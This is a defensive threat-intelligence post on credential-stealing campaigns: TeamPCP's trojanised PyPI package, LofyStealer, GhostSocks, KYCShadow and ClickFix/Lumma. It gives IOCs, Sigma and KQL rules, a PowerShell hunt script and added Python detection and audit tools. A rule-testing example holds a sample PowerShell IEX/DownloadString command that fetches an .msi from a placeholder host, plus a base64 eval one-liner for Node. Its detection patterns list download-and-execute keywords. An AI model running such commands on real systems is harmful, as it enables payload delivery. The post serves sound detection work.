
OTX Pulse Analysis: TeamPCP Supply Chain Attack, LofyStealer, & Lumma Campaigns

Security Arsenal Team
May 3, 2026

Threat Summary

Recent OTX pulses indicate a convergence of sophisticated credential theft campaigns utilizing diverse initial access vectors ranging from software supply chain compromises to social engineering.

The most critical finding involves TeamPCP weaponizing the Telnyx Python SDK on PyPI, utilizing steganography to hide payloads in WAV files—a supply chain attack affecting 750,000 monthly downloads. Simultaneously, LofyStealer (LofyGang) targets the gaming sector (Minecraft) using a Node.js loader, while GhostSocks malware turns compromised devices into residential proxy nodes for credential theft.

Additionally, a ClickFix-style phishing campaign deploys Lumma Stealer via obfuscated PowerShell, and the KYCShadow Android trojan specifically targets Indian finance sectors through fake KYC workflows. The collective objective across these campaigns is the mass harvesting of credentials, cookies, and banking tokens for resale on the dark web.

Threat Actor / Malware Profile

TeamPCP (Python Supply Chain)

  • Distribution: Malicious telnyx package on PyPI.
  • Payload Behavior: Three-stage architecture. Stage 1 (the trojanized SDK) triggers a platform-specific loader. Stage 2 downloads a payload hidden via steganography inside a WAV file. Stage 3 deploys a credential harvester.
  • C2 Communication: Encrypted C2 channels; specific IOCs include scan.aquasecurtiy.org.
  • Persistence: Not specified in the source pulses; likely via the Python environment or scheduled tasks.
  • Anti-Analysis: Uses steganography to bypass network inspection.
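
Stage 2 of the chain above relies on a WAV file that still plays normally while carrying extra bytes. The following is an added example, not code from the pulses or from the Security Arsenal team: a small RIFF/WAVE chunk walker that flags the two places a carrier can hold data without breaking playback, bytes appended after the RIFF-declared end and non-standard chunks that players skip. The `build_wav` and `add_chunk` helpers only construct test fixtures; the chunk-ID allow-list in `KNOWN_CHUNKS` is an assumption about plain PCM files, not a value from the page.

```python
import struct
import sys

# Chunk IDs a plain PCM WAV is expected to carry (assumed allow-list); anything else is worth a look.
KNOWN_CHUNKS = {"fmt ", "data", "LIST", "fact", "cue ", "PEAK"}

def build_wav(pcm: bytes, sample_rate: int = 8000) -> bytes:
    """Constructed minimal 8-bit mono PCM WAV used as test input (not a sample from the pulses)."""
    fmt = struct.pack("<HHIIHH", 1, 1, sample_rate, sample_rate, 1, 8)
    pad = b"\x00" if len(pcm) % 2 else b""  # RIFF chunks are word-aligned
    body = (b"WAVE"
            + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", len(pcm)) + pcm + pad)
    return b"RIFF" + struct.pack("<I", len(body)) + body

def add_chunk(wav: bytes, chunk_id: bytes, payload: bytes) -> bytes:
    """Append an extra chunk inside the RIFF container and fix up the RIFF size (test fixture only)."""
    pad = b"\x00" if len(payload) % 2 else b""
    body = wav[8:] + chunk_id + struct.pack("<I", len(payload)) + payload + pad
    return b"RIFF" + struct.pack("<I", len(body)) + body

def inspect_wav(blob: bytes) -> dict:
    """Walk the RIFF chunk list and report bytes the container does not account for.

    trailing_bytes: data after the RIFF-declared end of file (ignored by every player).
    unknown_chunks: chunk IDs outside KNOWN_CHUNKS (players skip chunks they do not understand).
    """
    report = {"valid": False, "chunks": [], "unknown_chunks": [], "trailing_bytes": 0, "suspicious": False}
    if len(blob) < 12 or blob[:4] != b"RIFF" or blob[8:12] != b"WAVE":
        report["reason"] = "not a RIFF/WAVE file"
        return report
    riff_end = 8 + struct.unpack_from("<I", blob, 4)[0]
    if riff_end > len(blob):
        report["reason"] = "RIFF size exceeds file size (truncated file)"
        return report
    pos = 12
    while pos + 8 <= riff_end:
        chunk_id = blob[pos:pos + 4].decode("ascii", "replace")
        size = struct.unpack_from("<I", blob, pos + 4)[0]
        if pos + 8 + size > riff_end:
            report["reason"] = f"chunk {chunk_id!r} overruns the RIFF body"
            return report
        report["chunks"].append((chunk_id, size))
        if chunk_id not in KNOWN_CHUNKS:
            report["unknown_chunks"].append(chunk_id)
        pos += 8 + size + (size & 1)  # skip the pad byte after an odd-sized chunk
    report["valid"] = True
    report["trailing_bytes"] = len(blob) - riff_end
    report["suspicious"] = bool(report["unknown_chunks"]) or report["trailing_bytes"] > 0
    return report

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            result = inspect_wav(fh.read())
        state = "SUSPICIOUS" if result["suspicious"] else ("ok" if result["valid"] else "malformed")
        print(f"{path}: {state} trailing={result['trailing_bytes']} unknown={result['unknown_chunks']}")
```

Run it over the WAV files a Python process has recently written (the Sigma rule further down gives the network side of the same stage). A handful of trailing bytes can come from sloppy encoders, so treat the byte count, not just its presence, as the triage signal; a multi-kilobyte tail or an unrecognised chunk on a file fetched by a pip-installed package is what deserves a closer look.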

LofyGang (LofyStealer)

  • Distribution: Social engineering targeting Minecraft players.
  • Payload Behavior: A 53.5 MB Node.js loader (disguised as legitimate libraries) drops a 1.4 MB C++ payload that executes directly in memory (fileless).
  • Target: Steals cookies, passwords, tokens, and credit card data from 8 browsers.
  • Persistence: Not specified in the source pulses; likely registry Run keys or the Startup folder.

GhostSocks (Proxy/Stealer)

  • Distribution: MaaS (Malware-as-a-Service) on Russian forums.
  • Payload Behavior: Go binary implementing a SOCKS5 proxy. Partners with Lumma Stealer.
  • C2 Communication: TLS encrypted to blend in with normal traffic.

KYCShadow (Android)

  • Distribution: WhatsApp spam targeting India/British Indian Ocean Territory.
  • Payload Behavior: Multi-stage dropper masquerading as Bank KYC app. Uses WebView phishing.
  • C2 Communication: Firebase-based remote execution.
  • Capabilities: SMS interception, OTP theft, VPN manipulation.

ClickFix / Lumma Stealer

  • Distribution: Fake browser error pages (ClickFix) tricking users into running PowerShell.
  • Payload Behavior: Downloads malicious MSI, uses HijackLoader and DLL sideloading.

IOC Analysis

Indicator Types:

  • File Hashes: SHA256, MD5, SHA1 for Python packages, Node.js loaders, Go binaries, and Android APKs.
  • Network: Domains (e.g., retreaw.click, serv.biz), URLs (hosting MSI payloads), IP addresses (e.g., 85.11.161.198), Hostnames.

Operationalization: SOC teams should immediately load the hashes into EDR solutions for quarantine. Domains and IPs should be blocked at the perimeter (firewall/DNS). The PowerShell hunt script below provides a way to search endpoints for these specific artifacts (file hashes, process names, and recent Python/Node executions).

Detection Engineering

Sigma Rules

YAML
title: Potential TeamPCP PyPI Supply Chain Attack
id: 8a4f3b1c-9d2e-4f5a-8b1c-3d4e5f6a7b8c
description: Detects Python processes downloading potentially malicious files, specifically WAV or audio files, which may contain steganographic payloads as seen in the TeamPCP Telnyx SDK attack.
status: experimental
date: 2026/05/04
author: Security Arsenal
references:
    - https://hexastrike.com/resources/blog/threat-intelligence/ringing-in-chaos-how-teampcp-weaponized-the-telnyx-python-sdk
tags:
    - attack.initial_access
    - attack.t1195.002
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        # Image is the standard Sigma field for the connecting process in network_connection events
        Image|endswith: '\python.exe'
        DestinationHostname|contains:
            - 'github.com'
            - 'pypi.org'
            - 'raw.githubusercontent.com'
    filter_legit:
        # ordinary HTTPS package management; anything else from python.exe to these hosts fires
        DestinationPort: 443
    condition: selection and not filter_legit
falsepositives:
    - Legitimate Python package management
level: high
---
title: Suspicious PowerShell ClickFix Activity
id: 1b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
description: Detects PowerShell commands executing obfuscated scripts or downloading MSI payloads from non-standard ports, indicative of ClickFix campaigns distributing Lumma Stealer.
status: experimental
date: 2026/05/04
author: Security Arsenal
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_pwsh:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'DownloadString'
            - 'IEX'
            - 'FromBase64String'
    selection_network:
        CommandLine|contains: '.msi'
    condition: all of selection_*
falsepositives:
    - System administration scripts
level: critical
---
title: LofyStealer Node.js Loader Execution
id: 2c3d4e5f-6a7b-8c9d-0e1f-2a3b4c5d6e7f
description: Detects the execution of Node.js processes with arguments suggestive of loading in-memory payloads or spawning suspicious child processes, associated with LofyStealer.
status: experimental
date: 2026/05/04
author: Security Arsenal
tags:
    - attack.defense_evasion
    - attack.t1055.012
logsource:
    category: process_creation
    product: windows
detection:
    selection_node:
        Image|endswith: '\node.exe'
    selection_suspicious:
        CommandLine|contains:
            - 'eval'
            - 'Buffer'
            - 'child_process'
    condition: all of selection_*
falsepositives:
    - Legitimate Node.js development
level: medium
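
To see what the three rules above actually fire on before deploying them, the following added example (not part of the original post or of the Sigma project) transcribes their detection sections into Python dicts and evaluates them over constructed sample events. It implements only the Sigma subset these rules use: the `contains`, `endswith` and exact-match modifiers, list values as any-of, and conditions built from `and`, `not`, `all of <glob>` and `1 of <glob>`. The events, paths and hostnames are constructed; hostnames use the reserved `.invalid` TLD.

```python
import fnmatch

def _match_value(actual, expected, modifier):
    """Sigma string matching is case-insensitive by default."""
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "":
        return a == e
    if modifier == "contains":
        return e in a
    if modifier == "endswith":
        return a.endswith(e)
    if modifier == "startswith":
        return a.startswith(e)
    raise ValueError(f"unsupported modifier: {modifier}")

def selection_matches(selection, event):
    """A selection maps 'Field|modifier' to a value or list of values (list = any-of);
    every field in the selection must match for the selection to match."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        candidates = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(event[field], e, modifier) for e in candidates):
            return False
    return True

def condition_true(condition, results):
    """Evaluate terms joined by 'and': a selection name, 'not <name>', 'all of <glob>' or '1 of <glob>'."""
    for term in condition.split(" and "):
        term = term.strip()
        negate = term.startswith("not ")
        if negate:
            term = term[4:].strip()
        if term.startswith("all of "):
            names = fnmatch.filter(results, term[len("all of "):])
            value = bool(names) and all(results[n] for n in names)
        elif term.startswith("1 of "):
            value = any(results[n] for n in fnmatch.filter(results, term[len("1 of "):]))
        else:
            value = results[term]
        if value == negate:  # a false term, or a true negated term, fails the conjunction
            return False
    return True

def rule_matches(rule, event):
    if rule["logsource"]["category"] != event.get("category"):
        return False
    detection = rule["detection"]
    results = {name: selection_matches(sel, event)
               for name, sel in detection.items() if name != "condition"}
    return condition_true(detection["condition"], results)

# Detection sections transcribed from the three Sigma rules above (YAML -> Python dicts).
RULES = [
    {"title": "Potential TeamPCP PyPI Supply Chain Attack",
     "logsource": {"category": "network_connection"},
     "detection": {
         "selection": {"Image|endswith": "\\python.exe",
                       "DestinationHostname|contains": ["github.com", "pypi.org", "raw.githubusercontent.com"]},
         "filter_legit": {"DestinationPort": 443},
         "condition": "selection and not filter_legit"}},
    {"title": "Suspicious PowerShell ClickFix Activity",
     "logsource": {"category": "process_creation"},
     "detection": {
         "selection_pwsh": {"Image|endswith": "\\powershell.exe",
                            "CommandLine|contains": ["DownloadString", "IEX", "FromBase64String"]},
         "selection_network": {"CommandLine|contains": ".msi"},
         "condition": "all of selection_*"}},
    {"title": "LofyStealer Node.js Loader Execution",
     "logsource": {"category": "process_creation"},
     "detection": {
         "selection_node": {"Image|endswith": "\\node.exe"},
         "selection_suspicious": {"CommandLine|contains": ["eval", "Buffer", "child_process"]},
         "condition": "all of selection_*"}},
]

# Constructed sample events, not telemetry from the pulses. Events 2, 4 and 6 are the benign look-alikes.
EVENTS = [
    {"id": 1, "category": "process_creation", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"IEX((New-Object Net.WebClient).DownloadString('https://example.invalid/update.msi'))\""},
    {"id": 2, "category": "process_creation", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\Deploy\\install.ps1 -Package app.msi"},
    {"id": 3, "category": "process_creation", "Image": "C:\\Program Files\\nodejs\\node.exe",
     "CommandLine": "node.exe -e \"eval(Buffer.from(process.argv[1], 'base64').toString())\""},
    {"id": 4, "category": "process_creation", "Image": "C:\\Program Files\\nodejs\\node.exe",
     "CommandLine": "node.exe C:\\app\\server.js"},
    {"id": 5, "category": "network_connection", "Image": "C:\\Python312\\python.exe",
     "DestinationHostname": "raw.githubusercontent.com", "DestinationPort": 8080},
    {"id": 6, "category": "network_connection", "Image": "C:\\Python312\\python.exe",
     "DestinationHostname": "pypi.org", "DestinationPort": 443},
]

def run_rules(rules=RULES, events=EVENTS):
    """Return (event id, rule title) for every rule that fires on every event."""
    return [(ev["id"], r["title"]) for ev in events for r in rules if rule_matches(r, ev)]

if __name__ == "__main__":
    for event_id, title in run_rules():
        print(f"event {event_id}: {title}")
```

Events 1, 3 and 5 fire; events 2, 4 and 6 do not. Event 6 is the interesting one: it is Python talking to pypi.org on 443, so `filter_legit` suppresses it, which is exactly why the first rule's false-positive note reads "legitimate Python package management". Swapping in your own process-creation exports in place of `EVENTS` gives a quick false-positive estimate before the rules go into production.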

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for TeamPCP and ClickFix IOCs and behaviors
let lookback = 7d;
let IOCs = dynamic(["85.11.161.198", "retreaw.click", "serv.biz", "api.biz", "scan.aquasecurtiy.org"]);
let MaliciousHashes = dynamic(["6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a", "d21a5d08b4614005c8fcd9d0068f0190", "ddd2994acd25bde5ac32a03f1cf30b41"]);
// Network connections to C2. RemoteUrl usually carries the full URL, so has_any finds the
// domain inside it; in~ would only hit on an exact match.
DeviceNetworkEvents
| where Timestamp > ago(lookback)
| where RemoteIP in~ (IOCs) or RemoteUrl has_any (IOCs)
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP
| union (
    // Process launches whose image matches a known-bad hash
    DeviceProcessEvents
    | where Timestamp > ago(lookback)
    | where SHA256 in~ (MaliciousHashes) or MD5 in~ (MaliciousHashes)
    | project Timestamp, DeviceName, FileName, SHA256, MD5, FolderPath
)
| union (
    // PowerShell downloading an MSI (ClickFix). FileName is the launched process itself;
    // InitiatingProcessFileName would be its parent, whose command line is not the one filtered here.
    DeviceProcessEvents
    | where Timestamp > ago(lookback)
    | where FileName in~ ("powershell.exe", "pwsh.exe")
    | where ProcessCommandLine has ".msi" and (ProcessCommandLine has "Invoke-WebRequest" or ProcessCommandLine has "DownloadString")
    | project Timestamp, DeviceName, FileName, ProcessCommandLine
)
| order by Timestamp desc

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    IOC Hunt for TeamPCP, LofyStealer, and KYCShadow related artifacts.
.DESCRIPTION
    Scans for specific file hashes, suspicious process names, and recent Python/Node
    process creations associated with the OTX pulses. Run from an elevated prompt; the
    full-volume hash scan is slow on large disks.
#>

$MaliciousHashes = @(
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2",
    "d21a5d08b4614005c8fcd9d0068f0190",
    "ddd2994acd25bde5ac32a03f1cf30b41"
)

# Get-Process reports names without the .exe extension, so "node.exe" would never match
$SuspiciousProcesses = @("chromelevator", "GrabBot", "node")

# Split the indicators by algorithm: a 32-character MD5 can never equal a SHA256 digest
$Sha256Hashes = $MaliciousHashes | Where-Object { $_.Length -eq 64 }
$Md5Hashes    = $MaliciousHashes | Where-Object { $_.Length -eq 32 }

Write-Host "[+] Scanning for malicious file hashes..."
# Hash each file once and compare against the whole list, instead of re-walking C:\ per indicator
Get-ChildItem -Path C:\ -Recurse -File -Force -ErrorAction SilentlyContinue |
Where-Object { $_.Length -gt 0 } |
ForEach-Object {
    $file = $_
    if ($Sha256Hashes) {
        $sha256 = (Get-FileHash -LiteralPath $file.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($sha256 -and $Sha256Hashes -contains $sha256) {
            Write-Host "[!] SHA256 MATCH FOUND: $($file.FullName)" -ForegroundColor Red
        }
    }
    if ($Md5Hashes) {
        $md5 = (Get-FileHash -LiteralPath $file.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($md5 -and $Md5Hashes -contains $md5) {
            Write-Host "[!] MD5 MATCH FOUND: $($file.FullName)" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking for suspicious running processes..."
Get-Process | Where-Object { $SuspiciousProcesses -contains $_.ProcessName } |
Select-Object ProcessName, Id, Path | Format-Table

Write-Host "[+] Checking for recent Python/Node executions (Security event 4688)..."
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} -MaxEvents 1000 -ErrorAction SilentlyContinue |
Where-Object { $_.Message -match 'python\.exe' -or $_.Message -match 'node\.exe' } |
Select-Object TimeCreated, Message | Format-List

Response Priorities

  • Immediate:
    • Block all listed IOCs (IPs, domains, URLs) on perimeter firewalls and proxies.
    • Quarantine endpoints matching the provided file hashes.
    • Audit Python environments (pip list) for the telnyx package versions associated with TeamPCP.
  • 24 Hours:
    • Initiate credential resets for accounts accessed from endpoints flagged by EDR during the infection window.
    • Investigate network logs for connections to retreaw.click, serv.biz, or 85.11.161.198.
    • Review mobile device management (MDM) logs for installation of "KYC"-related apps.
  • 1 Week:
    • Implement strict allow-listing for PyPI packages in CI/CD pipelines to prevent supply chain poisoning.
    • Harden PowerShell configuration (e.g., enforce Script Block Logging).
    • Conduct user awareness training focused on "ClickFix" social engineering tactics and fake browser error pages.
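
The "audit Python environments" and "allow-list PyPI packages in CI/CD" items are easy to state and tedious to do by hand. The following added example (not code from the post or from the Security Arsenal team) covers both: it parses a requirements file, checks every package against an allow-list and a threat-intel watch-list, and flags entries that are not pinned with `==` or lack a `--hash=` option, which is what lets pip refuse a substituted artifact. The requirements text, the hash and the telnyx version in the sample `pip list --format=json` output are constructed placeholders; the page does not name the affected versions, so the watch-list match only tells you to go and verify.

```python
import json
import re
import sys

def normalize(name: str) -> str:
    """PEP 503 normalization so 'Telnyx', 'telnyx' and 'TELNYX' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()

# name, optional [extras], optional version operator, version
REQ_SPEC = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)(\[[^\]]*\])?\s*(===|==|~=|!=|>=|<=|<|>)?\s*([^\s;]*)")

def parse_requirements(text: str):
    """Yield one dict per requirement after joining backslash continuations and dropping
    comments and pip options (-r, --index-url, ...). Collects the --hash= options pip uses for pinning."""
    logical, buf = [], ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf.strip():
            logical.append(buf.strip())
        buf = ""
    for entry in logical:
        if entry.startswith("-"):
            continue
        parts = entry.split()
        match = REQ_SPEC.match(parts[0])
        if not match:
            continue
        yield {"name": normalize(match.group(1)),
               "op": match.group(3) or "",
               "version": match.group(4) or "",
               "hashes": [p.split("=", 1)[1] for p in parts[1:] if p.startswith("--hash=")]}

def audit_requirements(text: str, allow_list, watch_list):
    """Return (package, code, detail) findings: WATCHLIST, NOT_ALLOWED, UNPINNED, NO_HASH."""
    allowed = {normalize(n) for n in allow_list}
    watched = {normalize(n) for n in watch_list}
    findings = []
    for req in parse_requirements(text):
        name = req["name"]
        if name in watched:
            findings.append((name, "WATCHLIST", "package named in current threat intel; verify the installed version"))
        if name not in allowed:
            findings.append((name, "NOT_ALLOWED", "not on the CI/CD allow-list"))
        if req["op"] != "==":
            findings.append((name, "UNPINNED", f"specifier '{req['op']}{req['version']}' lets pip pick a newer release"))
        if not req["hashes"]:
            findings.append((name, "NO_HASH", "no --hash, so pip will not verify the downloaded artifact"))
    return findings

def audit_pip_list(pip_list_json: str, watch_list) -> dict:
    """Map watch-listed packages found in `pip list --format=json` output to their installed version."""
    watched = {normalize(n) for n in watch_list}
    return {normalize(p["name"]): p["version"]
            for p in json.loads(pip_list_json) if normalize(p["name"]) in watched}

# Constructed inputs; the hash and the telnyx version are placeholders, not values from the pulses.
SAMPLE_REQUIREMENTS = """\
# pinned and hash-verified: passes every check
requests==2.32.3 \\
    --hash=sha256:PLACEHOLDER_HASH_NOT_A_REAL_DIGEST
telnyx>=2.0            # SDK named in the TeamPCP pulse, range specifier, no hash
internal-tool==1.0.0   # not on the allow-list, no hash
"""
SAMPLE_PIP_LIST = json.dumps([{"name": "pip", "version": "24.0"},
                              {"name": "Telnyx", "version": "X.Y.Z-placeholder"}])
ALLOW_LIST = ["requests", "telnyx"]
WATCH_LIST = ["telnyx"]

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_REQUIREMENTS
    for pkg, code, detail in audit_requirements(text, ALLOW_LIST, WATCH_LIST):
        print(f"{code:<12}{pkg:<20}{detail}")
    print("watch-listed packages installed:", audit_pip_list(SAMPLE_PIP_LIST, WATCH_LIST))
```

In a pipeline, run `audit_requirements` against the lockfile and fail the build on `NOT_ALLOWED`; `UNPINNED` and `NO_HASH` are the findings that let a poisoned release of an otherwise approved package slip in, so they belong in the same gate. For the immediate audit item, feed real `pip list --format=json` output from each environment into `audit_pip_list` and compare the returned version against the TeamPCP pulse.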
